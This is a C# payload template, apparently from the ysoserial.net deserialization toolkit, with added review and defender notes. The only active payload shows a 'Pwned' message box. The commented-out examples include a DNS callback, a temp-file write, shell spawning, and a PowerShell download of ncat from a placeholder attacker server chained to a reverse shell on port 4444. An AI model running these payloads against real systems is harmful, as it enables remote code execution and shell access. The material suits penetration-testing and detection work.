﻿// ExploitClass was renamed to E to reduce the size a little bit
/// <summary>
/// Payload template: everything in the constructor body runs as soon as an
/// instance of this type is created. Exactly one example is active (the message
/// box); the remaining examples are commented out. Most examples carry a
/// -c value naming this source file plus the assemblies that example references.
/// </summary>
/// <remarks>
/// NOTE(review): the -c examples and the X-YSOSERIAL-NET marker below suggest this
/// file is compiled and instantiated by a ysoserial.net gadget; confirm against
/// the generator that consumes it.
/// </remarks>
class E
{
    /// <summary>
    /// Runs the selected payload. The constructor takes no arguments and keeps no state.
    /// </summary>
    public E()
    {
        // The try/catch wrapper is left commented out (here and at the end of the
        // constructor), so an exception thrown by the active payload propagates out
        // of the constructor to whatever created the instance.
        //try
        //{
        /* Payload code to be executed. Examples: */


        /* Showing a message box: -c "ExploitClass.cs;./dlls/System.Windows.Forms.dll" */
        // Active example. It only displays a modal error dialog titled "Pwned".
        // NOTE(review): a dialog is only visible when the instantiating process has an
        // interactive desktop; in a service or web worker process this call is
        // expected to fail or go unseen, so confirm before relying on it as proof.
        System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);


        /* Creating a text file: -c "ExploitClass.cs;./dlls/System.dll"  */
        // Disabled example: writes the line "testme" to C:\windows\temp\test.txt.
        // The block comment opened on the next line is closed by the "//*/" line after
        // the using block. Defender note: the artifact is a new file in the Windows
        // temp directory, created by the process that instantiated this class.
        /*
        using (System.IO.StreamWriter outputFile = new System.IO.StreamWriter(@"C:\windows\temp\test.txt"))
        {
            outputFile.WriteLine("testme");
        }
        //*/


        /* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;./dlls/System.dll" */
        // Disabled example: resolves a hostname so that execution can be confirmed out
        // of band. The hostname is the author's sample value, not a fixed indicator.
        // Defender note: the artifact is an outbound DNS lookup for an unfamiliar
        // external name, issued by the instantiating process.
        //System.Net.Dns.Resolve("8z89j28ubxz878iktsny9abwyn4ds2.burpcollaborator.net");


        /* Running a command: -c "ExploitClass.cs;./dlls/System.dll"  */
        // Disabled examples: start cmd.exe or powershell.exe as a child process.
        // "AttackerServer" and "AttackerServerIP" are placeholders in the original text.
        // Defender note: parent/child process telemetry shows a shell spawned by the
        // instantiating process; the second example also leaves a PowerShell
        // Net.WebClient DownloadFile call and a new executable under c:\windows\temp.
        //System.Diagnostics.Process.Start("cmd.exe", "/c calc");
        //System.Diagnostics.Process.Start("powershell.exe", "-Command \"(New-Object Net.WebClient).DownloadFile(\\\"http://AttackerServer/ncat.exe\\\", \\\"c:\\windows\\temp\\ncat.exe\\\")\"");// & c:\\windows\\temp\\ncat.exe -nv AttackerServerIP 4444 -e powershell.exe");


        /* Causing a delay */
        // Disabled example: blocks the calling thread, so execution shows up as a
        // measurable delay rather than as any output.
        //System.Threading.Thread.Sleep(10000); // waits for 10 seconds

        /*For web pentesting*/
        // Disabled example: adds a response header and a cookie, both named
        // X-YSOSERIAL-NET with the value "HERE", to the current HTTP response and then
        // ends that response. Defender note: that header or cookie name in responses
        // or proxy logs marks a run of this test payload.
        // NOTE(review): no -c value is given for this example; it presumably needs a
        // reference to System.Web.dll, so confirm before enabling it.
        /*
        System.Web.HttpContext.Current.Response.AddHeader("X-YSOSERIAL-NET","HERE");
        System.Web.HttpContext.Current.Response.Cookies.Add(new System.Web.HttpCookie("X-YSOSERIAL-NET", "HERE"));
        System.Web.HttpContext.Current.Response.End();
        */
        //}
        //catch (Exception)
        //{
        //}
    }
}
